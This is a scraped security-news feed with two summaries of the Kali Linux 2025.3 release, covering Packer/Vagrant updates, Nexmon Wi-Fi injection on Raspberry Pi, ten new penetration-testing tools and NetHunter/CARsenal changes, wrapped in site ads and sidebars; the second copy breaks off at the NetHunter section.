				<a href="https://www.patreon.com/posts/create-evasive-111421720" target="_blank"><span class="et_pb_image_wrap "><img fetchpriority="high" decoding="async" width="800" height="120" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2.png" alt="Patreon" title="Patreon" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw" class="wp-image-282931"></span></a>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_0 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_3">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_3 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_3  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner">Reading Time: 3 Minutes</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_4">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_4 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_4  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 data-start="549" data-end="567"><strong>Release summary</strong></h2>
<p data-start="569" data-end="1015">Kali Linux 2025.3 is now available, delivering a mix of infrastructure refreshes, wireless improvements and fresh tooling. Key highlights since the 2025.2 release include updated <strong data-start="748" data-end="768">Packer &amp; Vagrant</strong> support, <strong data-start="778" data-end="788">Nexmon</strong> integration for Raspberry Pi Wi-Fi monitor/injection capabilities, and <strong data-start="860" data-end="876">10 new tools</strong> added to the repositories.</p>
<hr data-start="1017" data-end="1020">
<h2 data-start="1022" data-end="1061"><strong>Packer &amp; Vagrant — toolchain refresh</strong></h2>
<p data-start="1063" data-end="1391">HashiCorp tooling used by many Kali workflows received updates: <strong data-start="1127" data-end="1137">Packer</strong> and <strong data-start="1142" data-end="1153">Vagrant</strong> have been refreshed in the distribution, improving builders and development workflows that rely on VM images and appliance automation. This benefits infrastructure-as-code users who build and distribute Kali images for labs and training.</p>
<hr data-start="1393" data-end="1396">
<h2 data-start="1398" data-end="1449"><strong>Nexmon support — Raspberry Pi wireless injection</strong></h2>
<p data-start="1451" data-end="1797">A major usability win for wireless testers: Kali 2025.3 adds <strong data-start="1512" data-end="1530">Nexmon support</strong> enabling <strong data-start="1540" data-end="1586">internal monitor mode and packet injection</strong> on Raspberry Pi built-in Wi-Fi chips. That brings affordable, fully capable wireless testing to a broader range of Pi devices and makes compact test rigs easier to deploy for red teams and wireless researchers.</p>
<hr data-start="1799" data-end="1802">
<h2 data-start="1804" data-end="1850"><strong>Xfce VPN IP plugin — configurable interface</strong></h2>
<p data-start="1852" data-end="2286">The Xfce <strong data-start="1861" data-end="1884">VPN IP panel plugin</strong> introduced in 2024.1 gets a practical usability upgrade: you can now <strong data-start="1954" data-end="2008">select which network interface the plugin monitors</strong>. Right-click the plugin → Preferences → update the “Command” parameter to choose a different interface; this is useful if you run multiple VPNs or want to monitor non-default adapters. If the plugin isn’t visible, add the “Generic Monitor” plugin via Panel Preferences → Items.</p>
<p data-start="1852" data-end="2286"><img decoding="async" class="aligncenter" src="https://www.kali.org/blog/kali-linux-2025-3-release/images/xfce-vpn-ip-plugin.png" alt="" width="806" height="599"></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_5 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><strong>See Also: So, you want to be a hacker?<br>
</strong><strong><a href="https://www.blackhatethicalhacking.com/courses/" target="_blank" rel="noopener noreferrer">Offensive Security, Bug Bounty Courses</a></strong></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_6  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_7  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h4><span><strong>Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.</strong></span></h4>
<p><a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" class="alignnone wp-image-276050 size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png" alt="" width="800" height="120" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw"></a></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_8  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 data-start="2293" data-end="2325"><strong>Ten new tools (quick rundown)</strong></h2>
<p data-start="2327" data-end="2472">Kali 2025.3 adds ten packages to network repositories, expanding capabilities across web testing, protocol abuse, LLM integrations, and pivoting:</p>
<ul>
<li data-start="2476" data-end="2544"><a href="https://www.kali.org/tools/caido/" target="_blank" rel="noopener"><strong data-start="2476" data-end="2485">Caido</strong> </a>— client GUI for the Caido web security auditing toolkit</li>
<li data-start="2547" data-end="2610"><a href="https://www.kali.org/tools/caido-cli/" target="_blank" rel="noopener"><strong data-start="2547" data-end="2560">Caido-cli</strong> </a>— server/backend component of the Caido toolkit</li>
<li data-start="2613" data-end="2674"><a href="https://www.kali.org/tools/detect-it-easy/" target="_blank" rel="noopener"><strong data-start="2613" data-end="2637">Detect It Easy (DiE)</strong></a> — file type identification utility</li>
<li data-start="2677" data-end="2749"><a href="https://www.kali.org/tools/gemini-cli/" target="_blank" rel="noopener"><strong data-start="2677" data-end="2691">Gemini CLI</strong> </a>— open-source AI agent for terminal-based Gemini access</li>
<li data-start="2752" data-end="2828"><a href="https://www.kali.org/tools/krbrelayx/" target="_blank" rel="noopener"><strong data-start="2752" data-end="2765">krbrelayx</strong> </a>— Kerberos relaying / unconstrained delegation abuse toolkit</li>
<li data-start="2831" data-end="2897"><a href="https://www.kali.org/tools/ligolo-mp/" target="_blank" rel="noopener"><strong data-start="2831" data-end="2844">ligolo-mp</strong></a> — multiplayer pivoting / lateral movement solution</li>
<li data-start="2900" data-end="2983"><a href="https://www.kali.org/tools/llm-tools-nmap/" target="_blank" rel="noopener"><strong data-start="2900" data-end="2918">llm-tools-nmap</strong></a> — enabling LLM-driven network discovery and scanning with nmap</li>
<li data-start="2986" data-end="3051"><a href="https://www.kali.org/tools/mcp-kali-server/" target="_blank" rel="noopener"><strong data-start="2986" data-end="3005">mcp-kali-server</strong></a> — MCP config to connect an AI agent to Kali</li>
<li data-start="3054" data-end="3153"><a href="https://www.kali.org/tools/patchleaks/" target="_blank" rel="noopener"><strong data-start="3054" data-end="3068">patchleaks</strong></a> — detects security fixes and summarizes patches for rapid validation (or analysis)</li>
<li data-start="3156" data-end="3233"><a href="https://www.kali.org/tools/vwifi-dkms/" target="_blank" rel="noopener"><strong data-start="3156" data-end="3170">vwifi-dkms</strong></a> — create virtual Wi-Fi networks (dummy interfaces) for testing</li>
</ul>
<p data-start="3235" data-end="3344">These additions broaden both classic offensive toolsets and modern workflows that incorporate AI/LLM tooling.</p>
<hr data-start="3346" data-end="3349">
<h2 data-start="3351" data-end="3396"><strong>Kali NetHunter — mobile and device updates</strong></h2>
<p data-start="3398" data-end="3831">NetHunter continues to advance: the project brought a new budget-friendly device with internal monitor mode and injection beyond the Nexus 5 era — the <strong data-start="3549" data-end="3571">Samsung Galaxy S10</strong> port (Nexmon firmware patches + NetHunter kernel). The collaboration (Nexmon, kernel port, and app stability fixes) now provides a viable, modern device for mobile wireless testing. Installation guides for Nexmon + NetHunter are available in the project docs.</p>
<p><span class="lO9hj"></span></p>
<hr data-start="3833" data-end="3836">
<h2 data-start="3838" data-end="3895"><strong>CARsenal (NetHunter Car Hacking) — revamp and features</strong></h2>
<p data-start="3897" data-end="3949">CARsenal received a substantial update and refactor:</p>
<ul>
<li data-start="3953" data-end="4027">Settings moved to the menu bar; service commands editable via long-press</li>
<li data-start="4030" data-end="4093">New <strong data-start="4034" data-end="4052">RFCOMM Connect</strong> service and improved tools integration</li>
<li data-start="4096" data-end="4178"><strong data-start="4096" data-end="4109">Simulator</strong> (formerly ICSim) and <strong data-start="4131" data-end="4140">UDSim</strong> added for richer simulation/testing</li>
<li data-start="4181" data-end="4260">New <strong data-start="4185" data-end="4196">MSF tab</strong> to run automotive Metasploit modules against hardware bridges</li>
<li data-start="4263" data-end="4349">UI refreshes, extensive bug fixes, and full documentation rewrite for 2025.3 content</li>
<li data-start="4352" data-end="4442">New kernel support for CAN on OnePlus6 LineageOS 22.2 (Android 15) — OnePlus6 (6T pending)</li>
</ul>
<p data-start="4444" data-end="4546">The team warns: do not test CARsenal on a production/daily-driver vehicle — use isolated lab hardware.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_9 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/articles/how-penetration-testing-supports-dora-compliance-for-financial-and-ict-entities/" target="_blank" rel="noopener noreferrer">How Penetration Testing Supports DORA Compliance for Financial and ICT Entities<br>
</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_10  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News Adsense Adcode Horizontal --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_11 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/tools/ringreaper/" target="_blank" rel="noopener">Offensive Security Tool: RingReaper<br>
</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_12  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<h2 data-start="4553" data-end="4574"><strong>What’s coming next</strong></h2>
<p data-start="4576" data-end="4837">Looking ahead to 2025.4, expect more UI polish, improved Metasploit terminal screens, simulator enhancements and additional device/kernel support. CARsenal maintainers plan video demos and continued refinement; community feedback and bug reports are encouraged.</p>
<hr data-start="4839" data-end="4842">
<h2 data-start="4844" data-end="4878"><strong>Where to get it &amp; upgrade notes</strong></h2>
<p data-start="4880" data-end="4976">Kali 2025.3 is available through the usual Kali channels and network repositories. Users should:</p>
<ul>
<li>Update existing installs via <code data-start="5009" data-end="5041">apt update &amp;&amp; apt full-upgrade</code> (follow Kali release guidance).</li>
<li>Review the new tools list and post-install any packages you need.</li>
<li>Consult NetHunter/CARsenal installation guides for device-specific steps (especially for Nexmon patches and kernels).</li>
<li>Test Nexmon and wireless features in a lab environment before operational use.</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_13 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/news/spamgpt-ai-powered-phishing-toolkit-redefines-email-threat-landscape/" target="_blank" rel="noopener noreferrer">SpamGPT: AI-Powered Phishing Toolkit Redefines Email Threat Landscape<br>
</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_14  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><blockquote><p><em>Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? </em><em>If you want to express your idea in an article contact us here for a quote: <strong>info@blackhatethicalhacking.com</strong></em></p></blockquote></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_15  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><em>Source: www.kali.org</em></strong></p>
<p><a href="https://www.kali.org/blog/kali-linux-2025-3-release/" target="_blank" rel="noopener"><strong>Read the full blog:<br>Kali Blog Release</strong></a></p></div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_1 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_image et_pb_image_1 store-img">
				
				
				
				
				<a href="https://store.blackhatethicalhacking.com/" target="_blank"><span class="et_pb_image_wrap "><img decoding="async" width="1142" height="500" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png" alt="Merch" title="Store" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png 1142w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-980x429.png 980w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-480x210.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1142px, 100vw" class="wp-image-271829"></span></a>
			</div><div class=" et_pb_logo_slider  et_pb_logo_slider_0 ">
                
            </div>
			</div>
				
				
				
				
			</div>
			</div><div class="et_pb_column et_pb_column_1_4 et_pb_column_1    et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_module et_pb_sidebar_0 news-sidebar1 et_pb_widget_area clearfix et_pb_widget_area_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget rpwe_widget recent-posts-extended"><h4 class="widgettitle">Recent News</h4><div class="rpwe-block news-recent-posts-sb"><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/critical-entra-id-flaw-could-have-let-attackers-seize-any-microsoft-tenant/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/09/877x440-Images-for-the-News-posts-25-300x150.png" alt="Critical Entra ID Flaw Could Have Let Attackers Seize Any Microsoft Tenant" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/critical-entra-id-flaw-could-have-let-attackers-seize-any-microsoft-tenant/" target="_self">Critical Entra ID Flaw Could Have Let Attackers Seize Any Microsoft Tenant</a></h3><time class="rpwe-time published" datetime="2025-09-22T11:45:29+02:00">September 22, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/sixth-chrome-zero-day-of-2025-patched-after-active-exploitation/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/09/877x440-Images-for-the-News-posts-24-300x150.png" alt="Sixth Chrome Zero-Day of 2025 Patched After Active Exploitation" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/sixth-chrome-zero-day-of-2025-patched-after-active-exploitation/" target="_self">Sixth Chrome Zero-Day of 2025 Patched After Active Exploitation</a></h3><time class="rpwe-time published" datetime="2025-09-19T09:59:51+02:00">September 19, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/spamgpt-ai-powered-phishing-toolkit-redefines-email-threat-landscape/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/09/877x440-Images-for-the-News-posts-22-300x150.png" alt="SpamGPT: AI-Powered Phishing Toolkit Redefines Email Threat Landscape" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/spamgpt-ai-powered-phishing-toolkit-redefines-email-threat-landscape/" target="_self">SpamGPT: AI-Powered Phishing Toolkit Redefines Email Threat Landscape</a></h3><time class="rpwe-time published" datetime="2025-09-16T11:27:18+02:00">September 16, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/new-hybridpetya-ransomware-bypasses-uefi-secure-boot-protection/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/09/877x440-Images-for-the-News-posts-21-300x150.png" alt="New HybridPetya Ransomware Bypasses UEFI Secure Boot Protection" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/new-hybridpetya-ransomware-bypasses-uefi-secure-boot-protection/" target="_self">New HybridPetya Ransomware Bypasses UEFI Secure Boot Protection</a></h3><time class="rpwe-time published" datetime="2025-09-15T10:37:25+02:00">September 15, 2025</time><div class="rpwe-summary"></div></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></div><div class="et_pb_widget widget_block"><h3>EXPLORE OUR STORE</h3></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="233" height="300" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Tshirt-233x300.png" class="image wp-image-280999  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="300" height="280" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/RedTeamers-e1725807706904-300x280.png" class="image wp-image-281001  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="711" height="1024" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Hoodie-711x1024.png" class="image wp-image-281002  attachment-large size-large" alt=""></a></div><div class="widget_text et_pb_widget widget_custom_html"><div class="textwidget custom-html-widget"> <!-- News Adsense Adcode --> <ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div></div>
			</div><div class="et_pb_module et_pb_sidebar_1 news-sidebar2 et_animated et_pb_widget_area clearfix et_pb_widget_area_left  et_pb_text_align_justified et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget widget_block"><a href="https://www.blackhatethicalhacking.com/courses/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png"></a>
<h3>Offensive Security &amp; Ethical Hacking Course</h3>
<p>Begin the learning curve of hacking now!</p>
</div><div class="et_pb_widget widget_block"><hr>
<a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Solutions.png"></a>
<h3>Information Security Solutions</h3>
<p>Find out how Pentesting Services can help you.</p></div><div class="et_pb_widget widget_block"><hr>
<a href="https://discord.gg/EYMqveWXkv"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/10/Discord.png"></a>
<h3>Join our Community</h3></div>
			</div>
			</div>
				</div>
				
			</div>The post <a href="https://www.blackhatethicalhacking.com/news/kali-linux-2025-3-released-with-10-new-tools-nexmon-wi-fi-injection-for-raspberry-pi-and-vagrant-updates/">Kali Linux 2025.3 released with 10 New Tools, Nexmon Wi-Fi Injection for Raspberry Pi and Vagrant Updates</a> first appeared on <a href="https://www.blackhatethicalhacking.com/">Black Hat Ethical Hacking</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2025.3 Release (Vagrant & Nexmon)]]></title>
<description><![CDATA[Another quarter, another drop - Kali 2025.3 is now here! Bringing you another round of updates, new features and introducing some new tools - pushing Kali further.
The summary of the changelog since the 2025.2 release from June is:

Packer & Vagrant - HashiCorp’s products have had a refresh
Nexmo...]]></description>
<link>https://tsecurity.de/de/3000413/tools/kali-linux-20253-release-vagrant-nexmon/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3000413/tools/kali-linux-20253-release-vagrant-nexmon/</guid>
<pubDate>Tue, 23 Sep 2025 19:52:33 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Another quarter, another drop - Kali 2025.3 is now here! Bringing you another round of updates, new features and introducing some new tools - pushing Kali further.
The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2025-2-release/">2025.2 release from June</a> is:</p>
<ul>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2025-3-release/#hashicorp-packer--vagrant">Packer &amp; Vagrant</a></strong> - <em>HashiCorp’s products have had a refresh</em></li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2025-3-release/#nexmon-support">Nexmon Support</a></strong> - <em>Monitor mode and injection for Raspberry Pi’s in-built Wi-Fi</em></li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2025-3-release/#new-tools-in-kali">10 New Tools</a></strong> - <em>As always, various new packages added (as well as updates)</em></li>
</ul>
<hr>
<h2>HashiCorp: Packer &amp; Vagrant</h2>
<p>Kali has been using two HashiCorp products, which go hand-in-hand with each other:</p>
<ul>
<li><a href="https://developer.hashicorp.com/packer"><strong>Packer</strong></a> - <em><strong>Creating VMs</strong> for multiple platforms from a single source configuration</em></li>
<li><a href="https://developer.hashicorp.com/vagrant"><strong>Vagrant</strong></a> - <em><strong>Building and managing</strong> VM environments</em></li>
</ul>
<p>Until now, we have been using our Packer build-script to generate our Vagrant VMs. This has been working well for us.
We wanted to streamline our platform building process more, which prompted us to revisit how we generate Vagrant VMs.
Whilst it is possible to automate Packer, it was not ideal for our infrastructure setup and workflow <em>(e.g. trying to build Hyper-V images on Linux)</em>.</p>
<p>This caused us to refresh a few items:</p>
<ul>
<li><a href="https://gitlab.com/kalilinux/recipes/kali-preseed-examples">Kali <strong>pre-seed examples</strong></a> - Packer uses pre-seed to automate the Kali installer - we made sure they are <strong>all consistent</strong>.</li>
<li><a href="https://gitlab.com/kalilinux/build-scripts/kali-packer/-/tree/main">Kali <strong>Packer build-scripts</strong></a> - We were using v1 of the standards. <strong>We upgraded to v2</strong>.</li>
<li><a href="https://gitlab.com/kalilinux/build-scripts/kali-vm">Kali <strong>VM build-scripts</strong></a> - Vagrant images are VMs which a few tweaks done to them. <strong>We added these modification to our existing VM build-scripts</strong>.</li>
</ul>
<p>For more information, please keep reading our blog post: <a href="https://www.kali.org/blog/kali-vagrant-rebuilt/">Kali Vagrant Rebuilt: Out With Packer, In With DebOS</a></p>
<h2>Nexmon Support</h2>
<p>Nexmon is a “patched” firmware, for certain wireless chips, to extend their functionally to allow:</p>
<ul>
<li><strong>Monitor mode</strong> - <em>able to <strong>sniff packets</strong></em></li>
<li><strong>Injection mode</strong> - <em>frame injection allows for <strong>custom raw packets</strong> to be sent, outside of the “standard” stack ordering</em></li>
</ul>
<p>Both are really useful when it comes to information security!
<em>For the record, it is possible to-do both of the features above without Nexmon, as it depends on the device’s chipset and drivers.</em></p>
<p>Now, Nexmon supported wireless chips are Broadcom &amp; Cypress, which are in a various devices, including the Raspberry Pi’s in-built Wi-Fi!
In <a href="https://www.kali.org/blog/kali-linux-2025-1-release/">Kali 2025.1</a>, we changed how we package our Raspberry Pi kernel, as well as bump to a new major version. Now Nexmon support is back as well as supporting Raspberry Pi 5!
<em><strong>Other devices can also use Nexmon, its not limited to Raspberry Pis.</strong></em></p>
<p>To find out more, please see our previous blog post: <a href="https://www.kali.org/blog/raspberry-pi-wi-fi-glow-up/">The Raspberry Pi’s Wi-Fi Glow-Up</a></p>
<h2>Dropping ARMel</h2>
<p>We are announcing that we too are <strong>dropping support for ARMel</strong> (Acorn RISC Machine, Little-Endian). We are <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1113680">following Debian’s footsteps in this decision</a>: Debian “trixie” 13 is the <a href="https://www.debian.org/releases/trixie/release-notes/issues.en.html#armel-last-release">last release with ARMel support</a>, and Debian testing (which Kali is based on) doesn’t provide ARMel packages anymore.</p>
<p>Luckily, the <strong><a href="https://arm.kali.org/images.html">amount of devices</a> which use this architecture is very limited</strong>:</p>
<ul>
<li>Raspberry Pi 1 (Original)</li>
<li>Raspberry Pi Zero W</li>
<li><em>ODROID-W, which already is End-Of-Life</em>.</li>
</ul>
<p>We cannot justify the amount of resources, both human power as well as hardware, required to support such a limited amount of legacy hardware. <em>We would much rather put the time into RISC-V…</em></p>
<h2>Configurable VPN IP panel plugin (Xfce)</h2>
<p>In <a href="https://www.kali.org/blog/kali-linux-2024-1-release/">Kali 2024.1</a>, we introduced a new Xfce panel plugin that allows users to quickly check and copy the current IP address of their VPN connection. Until now, it was only possible to view the IP of the first VPN, but if you were using multiple connections or wanted to check a different interface, there was no way to switch it. To improve the usability of this plugin, <strong>we have now added the option to choose which network interface the plugin monitors</strong>.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2025-3-release/images/xfce-vpn-ip-plugin.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2025-3-release/images/xfce-vpn-ip-plugin.png" alt="">
</a>
</p>

<p>To configure it, right-click the VPN-IP plugin and open the preferences dialog, where you can set the new interface at the end of the <strong>“Command”</strong> parameter. If you don’t see the VPN-IP plugin, you can find it in the panel preferences by searching for the <strong>“Generic Monitor”</strong> plugin in the <strong>“Items”</strong> tab.</p>
<h2>New Tools in Kali</h2>
<p>It would not be a Kali release if there were not any new tools added! A quick run down of the <strong>10 tools</strong> which have been added to the network repositories:</p>
<ul>
<li><a href="https://www.kali.org/tools/caido/">Caido</a> - The client side of caido (the graphical/desktop aka the main interface) - a web security auditing toolkit</li>
<li><a href="https://www.kali.org/tools/caido-cli/">Caido-cli</a> - The server section of caido - a web security auditing toolkit</li>
<li><a href="https://www.kali.org/tools/detect-it-easy/">Detect It Easy (DiE)</a> - File type identification</li>
<li><a href="https://www.kali.org/tools/gemini-cli/">Gemini CLI</a> - An open-source AI agent that brings the power of Gemini directly into your terminal</li>
<li><a href="https://www.kali.org/tools/krbrelayx/">krbrelayx</a> - Kerberos relaying and unconstrained delegation abuse toolkit</li>
<li><a href="https://www.kali.org/tools/ligolo-mp/">ligolo-mp</a> - Multiplayer pivoting solution</li>
<li><a href="https://www.kali.org/tools/llm-tools-nmap/">llm-tools-nmap</a> - Enables LLMs to perform network discovery and security scanning tasks using the nmap</li>
<li><a href="https://www.kali.org/tools/mcp-kali-server/">mcp-kali-server</a> - MCP configuration to connect AI agent to Kali</li>
<li><a href="https://www.kali.org/tools/patchleaks/">patchleaks</a> - Spots the security fix and provides detailed description so you can validate - or weaponize - it fast</li>
<li><a href="https://www.kali.org/tools/vwifi-dkms/">vwifi-dkms</a> - Setup “dummy” Wi-Fi networks, establishing connections, and disconnecting from them</li>
</ul>
<p><em>There have also been numerous packages updates and new libraries as well.</em></p>
<div class="notices info">
<p data-header="Info">
As a heads up, we are looking at <strong>altering the tools which get installed by default in Kali 2025.4</strong>, via the <code>kali-linux-default</code> metapackage.
</p>
</div>
<h2>Kali NetHunter Updates</h2>
<p>Kali NetHunter team and the community has been busy working away on Kali on mobile devices, with Kali NetHunter, <a href="https://store.nethunter.com/packages/com.offsec.nethunter/">app</a> and <a href="https://store.nethunter.com/packages/com.offsec.nhterm/">terminal</a>!</p>
<h3>Wireless Injection</h3>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2025-3-release/images/Kali-NetHunter-WiFi-Injection.jpeg" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2025-3-release/images/Kali-NetHunter-WiFi-Injection.jpeg" alt="">
</a>
</p>

